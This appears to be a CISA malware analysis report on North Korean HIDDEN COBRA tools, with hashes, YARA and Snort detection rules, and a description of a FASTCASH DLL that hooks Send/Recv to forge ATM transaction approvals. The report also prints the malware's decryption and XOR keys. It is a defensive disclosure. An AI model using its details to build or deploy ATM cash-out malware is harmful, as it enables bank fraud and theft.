SHA256 f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de
SHA512 6774cc49f5200d1a427b5a2af77d27eaac671f405e01f3ded2d152e5e08d1217d2b3b9d8508d2924aee5f0925abc32f83645756cf248222193eb13194eb39add
ssdeep 6144:+TW3SZ4GvcPPWi9JhJTxPm26ebMk5Q35m8LERov:invQThJsexib
Entropy 6.304640
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan[Banker]/Win32.Alreay
Avira TR/AD.APTLazerus.dsenf
BitDefender Gen:Variant.Razy.368693
ClamAV Win.Trojan.Agent-6971031-0
Comodo Malware
Cyren W64/Alreay.C
ESET a variant of Win64/NukeSped.BB trojan
Emsisoft Gen:Variant.Razy.368693 (B)
Ikarus Trojan.Win64.Nukesped
K7 Trojan ( 00538e2b1 )
Lavasoft Gen:Variant.Razy.368693
McAfee PWS-Banker.gen.gj
Symantec Trojan.Gen.6
Systweak trojan.banker
TrendMicro BKDR64_.8979788A
TrendMicro House Call BKDR64_.8979788A
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.GenericKD.Win32.133035
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r2.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Dropper Proxy Spyware Trojan”
           Family = “TWOPENCE”
           Description = “Detects strings in TWOPENCE proxy tool”
           MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
           SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
           MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
           SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
           MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
           SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
           MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
           SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
           MD5_5 = “889e320cf66520485e1a0475107d7419”
           SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
       strings:
           $cmd1 = “ssylka”
           $cmd2 = “ustanavlivat”
           $cmd3 = “poluchit”
           $cmd4 = “pereslat”
           $cmd5 = “derzhat”
           $cmd6 = “vykhodit”
           $cmd7 = “Nachalo”
           $cmd8 = “kliyent2podklyuchit”
           $frmt1 = “Host: %s%s%s:%hu”
           $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
       condition:
           (4 of ($cmd*)) and (1 of ($frmt*))
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-05-01 23:24:39-04:00
Import Hash b2b084698f33fd93bc9e72f0c2af26b5
PE Sections
MD5 Name Raw Size Entropy
379ffb6e4aeb96c753dbe1f16dae01db header 1024 2.516799
33c1647f8f3a870e4c8f9b48b5ec2c82 .text 212480 6.373885
5bb6bf3a50e4982066d5746d99945853 .rdata 31232 5.302106
a62c434f5beb6282b437c5e0dc40c616 .data 7168 2.877953
6ba7963edd09a132976d6830462fc17f .pdata 11776 5.348074
06ce263d0dc81197b88ff3f576787648 .reloc 1536 2.915027
Packers/Compilers/Cryptors
Microsoft Visual C++ 8.0 (DLL)
Description

This file is a 64-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

Tags

HIDDEN-COBRAproxyspywaretrojan

Details
Name 9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852
Size 232960 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 97aaf130cfa251e5207ea74b2558293d
SHA1 c7e7dd96fefca77bb1097aeeefef126d597126bd
SHA256 9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852
SHA512 d8b750263ac8b295a934ef60a694108257c489055c6aee24bae000d70d0bdde70934e8c2a157d38c15469bc5fb2a6cfcb733ddd4729ba05200dfa243913cf73d
ssdeep 3072:6U5r72JE+FYWR0jZLShk4cPT/QzSaQ0sCFneZTznIhZJJcrJ1GHeV9:6U5uJpYnZL05STQNddFnAnGZIrV
Entropy 6.524151
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan[Banker]/Win32.Alreay
BitDefender Trojan.Generic.22528938
ClamAV Win.Trojan.Agent-6971031-0
Comodo Malware
Cyren W32/Alreay.SQQX-6406
ESET a variant of Win32/Spy.Banker.ADRO trojan
Emsisoft Trojan.Generic.22528938 (B)
Ikarus Trojan-Spy.Agent
K7 Spyware ( 005198041 )
Lavasoft Trojan.Generic.22528938
McAfee GenericRXFQ-MX!97AAF130CFA2
Microsoft Security Essentials Trojan:Win32/Alreay
NANOAV Trojan.Win32.Alreay.ettzed
NetGate Trojan.Win32.Malware
Sophos Troj/Banker-GUU
Symantec Trojan.Gen.2
TrendMicro Trojan.79245AFC
TrendMicro House Call Trojan.79245AFC
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.Alreay.Win32.42
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r2.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Dropper Proxy Spyware Trojan”
           Family = “TWOPENCE”
           Description = “Detects strings in TWOPENCE proxy tool”
           MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
           SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
           MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
           SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
           MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
           SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
           MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
           SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
           MD5_5 = “889e320cf66520485e1a0475107d7419”
           SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
       strings:
           $cmd1 = “ssylka”
           $cmd2 = “ustanavlivat”
           $cmd3 = “poluchit”
           $cmd4 = “pereslat”
           $cmd5 = “derzhat”
           $cmd6 = “vykhodit”
           $cmd7 = “Nachalo”
           $cmd8 = “kliyent2podklyuchit”
           $frmt1 = “Host: %s%s%s:%hu”
           $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
       condition:
           (4 of ($cmd*)) and (1 of ($frmt*))
    }
ssdeep Matches
99 aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83
PE Metadata
Compile Date 2017-02-20 06:09:30-05:00
Import Hash 6b8fa355d78d649f199232a25e22d630
PE Sections
MD5 Name Raw Size Entropy
bb573973d723ebac15a2dd783a56921f header 1024 2.372576
e6412e7fb561ead2b3eddef9bafd3518 .text 198656 6.554337
a9890fd54b24cf53425649a92fe290ad .rdata 18432 5.115959
884e0d48d1830995eeade874d295ced0 .data 5632 3.201975
0e79f25ba5ec9ae1502fe80ec7b08f79 .reloc 9216 5.674607
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38

Tags

HIDDEN-COBRAbackdoorproxytrojan

Details
Name 70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38
Size 1637888 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3c9e71400b72cc0213c9c3e4ab4df9df
SHA1 bdb632b27ddb200693c1b0b80819a7463d4e7a98
SHA256 70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38
SHA512 c7a02fadb9fbbe0cf05dddd6a78cbf48b9030638420b421b4ff83816ae1cabbe54656b4e1c8e4020cacab93388934b6c79d3d21fe560ed4c7131ad5eba481ed0
ssdeep 24576:5gDgaE2r55ENJSOZ8jsAMZMF2kPupVevS6ieT17cZ/hJMIYO0:+D9vrrs8OZxZI+wvTTahqO
Entropy 7.956784
Antivirus
Ahnlab Trojan/Win32.Agent
Antiy Trojan/Win32.AGeneric
Avira TR/Crypt.TPM.Gen
BitDefender Gen:Variant.Symmi.79278
Comodo Malware
ESET Win32/Spy.Banker.AECT trojan
Emsisoft Gen:Variant.Symmi.79278 (B)
K7 Trojan ( 0040f4ef1 )
Lavasoft Gen:Variant.Symmi.79278
McAfee Generic Trojan.ej
Microsoft Security Essentials TrojanSpy:Win32/Banker
NANOAV Trojan.Win32.TPM.etiucd
Quick Heal Trojan.Generic
Sophos Troj/Agent-AXNK
Symantec Trojan.Gen.2
TrendMicro BKDR_KL.22A80489
TrendMicro House Call BKDR_KL.22A80489
VirusBlokAda Backdoor.Agent
Zillya! Backdoor.Agent.Win32.64626
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2017-02-20 06:09:30-05:00
Import Hash baa93d47220682c04d92f7797d9224ce
PE Sections
MD5 Name Raw Size Entropy
a32e7b28831808e208355ae637e006f0 header 4096 0.814733
ca42a315c5287101ffdf2d7843b74d34   119296 7.972251
d41d8cd98f00b204e9800998ecf8427e .rsrc 0 0.000000
9e66a842d63673e7febfc6646ea43c43 .idata 512 1.308723
5668c4714f706c7f669afb1e7f9c6ba7   512 0.260771
de90eb0d146d89f2c2dd76ecf17ea09e dworqjxn 1512960 7.955321
4857cc05e1ea968cfc978d53f2f34126 omrcmqfn 512 3.378388
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1

Tags

HIDDEN-COBRAproxyspywaretrojan

Details
Name 8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1
Size 480768 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 889e320cf66520485e1a0475107d7419
SHA1 f5fc9d893ae99f97e43adcef49801782daced2d7
SHA256 8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1
SHA512 8da0ab0b3072b3966c5e32c22e7ac5654ff3923b3cf28cc895ae10d520a27bb70360e4d94e54422033aa7c7527d10774ab6d8b8569bab8b6909eb3eab40d62bc
ssdeep 6144:sdqAqUok+00rm9TOi9Vc7/VtXvWLnJlh+efvoRKmjbL/xY4fTKKWSFle3IDgDi2C:xABogwttXuLnJlkkiKU/xtKYydF9iIU
Entropy 6.465490
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan/Win32.BTSGeneric
Avira TR/Spy.Banker.xbkax
BitDefender Trojan.Generic.20466258
ClamAV Win.Trojan.Agent-6971031-0
Comodo Malware
ESET a variant of Win64/Spy.Banker.AX trojan
Emsisoft Trojan.Generic.20466258 (B)
Ikarus Trojan-Spy.Win64.Agent
K7 Spyware ( 00504e561 )
Lavasoft Trojan.Generic.20466258
McAfee Trojan-FLEP!889E320CF665
Microsoft Security Essentials TrojanSpy:Win64/Cyruslish.A
NANOAV Trojan.Win64.Alreay.elwnmb
Sophos Troj/Banker-GSY
Symantec Trojan.Gen.2
TrendMicro BKDR64_.D1FB2862
TrendMicro House Call BKDR64_.D1FB2862
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.Banker.Win64.148
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
    {
       meta:
           Author = “CISA Trusted Third Party”
           Incident = “10301706.r2.v1”
           Date = “2020-08-11”
           Actor = “Hidden Cobra”
           Category = “Backdoor Dropper Proxy Spyware Trojan”
           Family = “TWOPENCE”
           Description = “Detects strings in TWOPENCE proxy tool”
           MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
           SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
           MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
           SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
           MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
           SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
           MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
           SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
           MD5_5 = “889e320cf66520485e1a0475107d7419”
           SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
       strings:
           $cmd1 = “ssylka”
           $cmd2 = “ustanavlivat”
           $cmd3 = “poluchit”
           $cmd4 = “pereslat”
           $cmd5 = “derzhat”
           $cmd6 = “vykhodit”
           $cmd7 = “Nachalo”
           $cmd8 = “kliyent2podklyuchit”
           $frmt1 = “Host: %s%s%s:%hu”
           $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
       condition:
           (4 of ($cmd*)) and (1 of ($frmt*))
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-08-26 00:11:49-04:00
Import Hash 1cd9192feb9402723bdada868b8c98de
PE Sections
MD5 Name Raw Size Entropy
2fb3e4c0734998f9629ba86c4e7c6e99 header 1024 2.603055
9319545c7ac53b81b3d56a722dad8ef1 .text 364032 6.423307
e406c9d4f3bdbdbab8191bb701e4ff57 .rdata 81920 6.056842
6198d24ba115f17c5597e2773cb51a75 .data 8704 3.090138
f7b6096db3b9ad55c3bad4c47de6d5b4 .pdata 22016 5.758547
ddf5f86578d6de91c211211bdd72f63f .reloc 3072 3.181451
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

Mitigation

The following Snort rules were provided by a CISA trusted third party:

// The following Snort rule can be used to detect proxy handshake
alert tcp any any -> any any (msg:”Proxy handshake detected”; content:”|a7 00 a7 00 fb 00 b0 00 8e 00 c5 00 b0 00 48 00 17 00 c5 00 8b 00 6a 00 8e 00 ec 00 f3 00 fe 00 d9 00 f3 00 a7 00 6a 00 ec 00 a7 00 b0 00 17 00 fc 00 48 00 48 00 09 00 09 00 09 00 48 00 8e 00 ce|”; rev:1; sid:1;)

// The following Snort rule can be used to detect encrypted proxy string kliyent2podklyuchit
alert tcp any any -> any any (msg:”Proxy string detected”; content:”|d1 14 23 b3 c7 b2 ac fe 70 0d 1c d1 14 b3 d7 f9 38 23 ac|”; rev:1; sid:1;)

// The following Snort rule can be used to detect encrypted proxy string poluchit
alert tcp any any -> any any (msg:”Proxy string detected”; content:”|70 0d 14 d7 f9 38 23 ac|”; rev:1; sid:1;)

// The following Snort rule can be used to detect encrypted proxy string pereslat
alert tcp any any -> any any (msg:”Proxy string detected”; content:”|70 c7 be c7 c9 14 ab ac|”; rev:1; sid:1;)

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 26, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as FASTCASH for Windows. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This submission included two unique files. The first file is a malicious application, which can be utilized to inject a dynamic link library (DLL) into a remote Windows process. The second file is a malicious Windows DLL. The DLL contains two functions that can hook callbacks to the Windows application programming interfaces (APIs) “Send” and “Recv” within a targeted process. These hook functions are utilized to intercept traffic received by the target process. In received Financial Messages, the malicious functions will look for targeted Primary Account Numbers (PAN) to deliver a custom response. It appears the malware will target a system on a bank infrastructure, which is designed to process automated teller machine (ATM) transactions.

This updated report included an additional sample that is used by advanced persistent threat (APT) cyber actors in the targeting of banking payment systems. The sample is a man-in-the-middle bank transaction modification malware. Once the malware is injected into an executable, it takes control of the send and receive functions in order to identify, log, and modify ISO 8583 messages. ISO 8583 is an international standard for financial transaction card originated interchanged messaging. This functionality enables the actor to withdraw more money than is actually available. The malware specifically targets ISO 8583 Point of Sale (POS) system messages, ATM transaction requests, and ATM balance inquiries. The sample uses code from open source repositories on the Internet and modifies the parsing code to support Extended Binary Coded Decimal Interchange Code (EBCDIC) encoding. EBCDIC is a character encoding format like the more commonly ASCII.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (3)

129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0 (switch.dll)

39cbad3b2aac6298537a85f0463453d54ab2660c913f4f35ba98fffeb0b15655 (switch.exe)

5cb7a352535b447609849e20aec18c84d8b58e377d9c6365eafb45cdb7ef949b (A2B1A45A242CEE03FAB0BEDB2E4605…)

Findings

129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0

Tags

HIDDEN-COBRAtrojan

Details
Name switch.dll
Size 118784 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 c4141ee8e9594511f528862519480d36
SHA1 2b22d9c673d031dfd07986906184e1d31908cea1
SHA256 129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0
SHA512 dfc1ad2cb2df2b79ac0f2254b605a2012b94529ac220350a4075e60b06717918175cff5c22e52765237b78ec4edffd6df20f333e28a405a4339a10288158e7fc
ssdeep 3072:lUGDXTpE8AKDKDOf+8ZagCfG4aAzFdIARrhxg6/ZpDA:+GDXTpFDKDMZagX4aAB2Cg6hpD
Entropy 6.454745
Antivirus
Antiy Trojan/Win32.Tiggre
Avira TR/Spy.Banker.pubvd
BitDefender Trojan.GenericKD.32541173
ClamAV Win.Trojan.Alreay-7189205-0
Comodo Malware
ESET a variant of Win32/NukeSped.GA trojan
Emsisoft Trojan.GenericKD.32541173 (B)
Ikarus Trojan.Spy.Banker
K7 Riskware ( 0040eff71 )
Lavasoft Trojan.GenericKD.32541173
McAfee Trojan-Banking
NANOAV Trojan.Win32.NukeSped.gexoae
Sophos Troj/Banker-GYS
Symantec Trojan Horse
TrendMicro Backdoo.62DC2502
TrendMicro House Call Backdoo.62DC2502
VirusBlokAda BScope.TrojanBanker.Agent
Zillya! Trojan.NukeSped.Win32.183
YARA Rules
  • rule CISA_10257062_01 : ATM_Malware
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10257062”
           Date = “2019-09-26”
           Last_Modified = “20200117_1732”
           Actor = “n/a”
           Category = “Financial”
           Family = “ATM_Malware”
           Description = “n/a”
           MD5_1 = “c4141ee8e9594511f528862519480d36”
           SHA256_1 = “129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0”
       strings:
           $x3 = “RECV SOCK= 0x%p, BUF= 0x%p, LEN= 0x%08X, RET= %08X, IP= %s, Port= %d” fullword ascii
           $x4 = “init_hashmap succ” fullword ascii
           $x5 = “89*(w8y92r3y9*yI2H28Y9(*y3@*” fullword ascii
       condition:
           ($x3) and ($x4) and ($x5)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-06-22 01:59:31-04:00
Import Hash 0ab159bd939411cb8df935bd9e7b5835
PE Sections
MD5 Name Raw Size Entropy
00f8301c11847b70346d6271098d8f1c header 1024 2.296500
c3bee35076d728ce32b67f5bc66587f3 .text 84992 6.641787
6b094443cad879acc7285f991243ddb0 .rdata 17920 5.170073
11060bd3e49075b78be8670ff46d9a48 .data 7168 4.275765
3637e0cd32608b060e308fdd9742ea97 .reloc 7680 4.792696
Packers/Compilers/Cryptors
Microsoft Visual C++ DLL *sign by CodeRipper
Description

This file is a malicious Windows 32-bit DLL. Upon execution, it attempts to read the file “c:\tempinfo.dat”. Analysis of this implant indicates the encrypted file “info.dat” will contain targeted PAN numbers, which are expected to be contained within transactions possibly originating from ATM systems. Analysis indicates the malware decrypts “info.dat” utilizing what appears to be the AES encryption algorithm. The key utilized for this decryption is displayed below:

–Begin Decryption Key–

89*(w8y92r3y9*yIy(8Y23RHWIEFH238

–End Decryption Key–

The decrypted contents of “info.dat” are then parsed. Sub-components of the file are then further decoded using a hard-coded rotating XOR cipher (Figure 1). The data used as the rotating XOR cipher key is displayed below:

–Begin Rotating XOR Cipher Key–

963007772C610EEEBA51099919C46D078FF46A7035A563E9A395649E3288DB0EA4B8DC791EE9D5E088D9D2972B4CB609BD7CB17E072DB8E7911DBF906410B71DF220B06A4871B9F3DE41BE847DD4DA1AEBE4DD6D51B5D4F4C785D38356986C13C0A86B647AF962FDECC9658A4F5C0114D96C0663633D0FFAF50D088DC8206E3B5E10694CE44160D5727167A2D1E4033C47D4044BFD850DD26BB50AA5FAA8B5356C98B242D6C9BBDB40F9BCACE36CD832755CDF45CF0DD6DC593DD1ABAC30D9263A00DE518051D7C81661D0BFB5F4B42123C4B3569995BACF0FA5BDB89EB802280888055FB2D90CC624E90BB1877C6F2F114C6858AB1D61C13D2D66B69041DC760671DB01BC20D2982A10D5EF8985B1711FB5B606A5E4BF9F33D4B8E8A2C9077834F9000F8EA8099618980EE1BB0D6A7F2D3D6D08976C6491015C63E6F4516B6B62616C1CD83065854E0062F2ED95066C7BA5011BC1F4088257C40FF5C6D9B06550E9B712EAB8BE8B7C88B9FCDF1DDD62492DDA15F37CD38C654CD4FB5861B24DCE51B53A7400BCA3E230BBD441A5DF4AD795D83D6DC4D1A4FBF4D6D36AE96943FCD96E34468867ADD0B860DA732D0444E51D03335F4C0AAAC97C0DDD3C710550AA41022710100BBE86200CC925B56857B3856F2009D466B99FE461CE0EF9DE5E98C9D9292298D0B0B4A8D7C7173DB359810DB42E3B5CBDB7AD6CBAC02083B8EDB6B3BF9A0CE2B6039AD2B1743947D5EAAF77D29D1526DB048316DC73120B63E3843B64943E6A6D0DA85A6A7A0BCF0EE49DFF099327AE000AB19E077D44930FF0D2A3088768F2011EFEC206695D5762F7CB67658071366C19E7066B6E761BD4FEE02BD3895A7ADA10CC4ADD676FDFB9F9F9EFBE8E43BEB717D58EB060E8A3D6D67E93D1A1C4C2D83852F2DF4FF167BBD16757BCA6DD06B53F4B36B248DA2B0DD84C1B0AAFF64A0336607A0441C3EF60DF55DF67A8EF8E6E3179BE69468CB361CB1A8366BCA0D26F2536E2685295770CCC03470BBBB91602222F260555BE3BBAC5280BBDB2925AB42B046AB35CA7FFD7C231CFD0B58B9ED92C1DAEDE5BB0C2649B26F263EC9CA36A750A936D02A906099C3F360EEB8567077213570005824ABF95147AB8E2AE2BB17B381BB60C9B8ED2920DBED5E5B7EFDC7C21DFDB0BD4D2D38642E2D4F1F8B3DD686E83DA1FCD16BE815B26B9F6E177B06F7747B718E65A0888706A0FFFCA3B06665C0B0111FF9E658F69AE62F8D3FF6B6145CF6C1678E20AA0EED20DD75483044EC2B30339612667A7F71660D04D476949DB776E3E4A6AD1AEDC5AD6D9660BDF40F03BD83753AEBCA9C59EBBDE7FCFB247E9FFB5301CF2BDBD8AC2BACA3093B353A6A3B4240536D0BA9306D7CD2957DE54BF67D9232E7A66B3B84A61C4021B685D942B6F2A37BE0BB4A18E0CC31BDF055A8DEF022D759800007398

–End Rotating XOR Cipher Key–

This application will not run without the file “info.dat”, which was not available at the time of analysis.

Upon execution, the malware creates the directory “C:tmp_DMP”. The malware will use this location as a working directory on the targeted system. The malware will store run time logs within this folder. When executed, the malware will create a log file with the following file name format “c:\tmp\_DMP\TMPL_%d_%d.tmp” in this folder and stamps it with the data “HK-Start”.

This binary contains two functions, which provides context to the malware’s purpose and capability. Analysis indicates this DLL is injected into a targeted process. In order to capture and analyze incoming network traffic, the malware hooks the “Send” and “Recv” Windows API within a targeted process. One of these functions, located at offset “0x00004f60”, appears to search for incoming network traffic for “x200” Financial Request Messages, such as the type that may be generated from an ATM banking system. When the malware captures data it uses the “getpeername” API to get the IP address of the connected host. It then converts this IP address to integer value using the “ntohs API”. If the integer value of the IP address matches either “16843029” or “33620245” the malware will search it for a “Financial Request Message” (Figure 6). If not, it will process the incoming data as normal, however it still attempts to log it to a file named “c:\tmp\_DMP\TMPL_%d_%d.tmp” in the format RECV SOCK= 0x%p, BUF= 0x%p, LEN= 0x%08X, RET= %08X, IP= %s, Port=.

Upon receipt of one of these Financial Request Messages, this structure will create a log file that is named with the following format: “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The format of the data logged in this log file will be as follows:

–Begin Logged Message Data–

Message(msg=%d, ct=%d, pc=%d, sd=%d, pan=%s, date=%s)

–End Logged Message Data–

Upon receipt of a Financial Request Message the malware will decode a portion of the data, which was AES decrypted from the file “info.dat” to see if portions of it match the incoming Financial Request Message (Figure 3). Although the file “info.dat” was not available for analysis, it appears the malware is ensuring the PAN numbers of the incoming message match one of the PAN numbers contained within “info.dat”.

Static analysis indicates the malware utilizes an encrypted file named “blk.dat”. This file is expected to contain a blacklist of ATM transactions, which will be denied by the hook function (Figure 2). This file was not available for analysis.

When the malware receives a request from an ATM, if it contains a PAN number configured in info.dat (Figure 3) and it is not on the blacklist in “blk.dat”, the malware will craft a response and send it to the ATM system (Figure 4). It appears the response to the ATM will allow the transaction to proceed and potentially allow the hackers to illegally withdraw money. If the transaction is hijacked and approved, the malware records this success in the encrypted log file “suc.dat”.

If the transaction is rejected, because it is on the blacklist in “blk.dat”, this error is logged to the file “err.dat”. If the transaction does not contain a configured PAN or a transaction on the blacklist, the malware will pass it on as normal to the targeted application. When the malware receives an identified Financial Request Message, it will log it to a file with the name format “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The message itself will be logged into this file with the format “Message(msg=%d, ct=%d, pc=%d, sd=%d, pan=%s, date=%s)”.

The actual response back to the ATM system will be logged into a file with the filename format “c:\tmp\_DMP\TMPL_%d_%d.tmp”. The format of the data written to this file will be send socket=0x%X, ret=%d, err=%d.

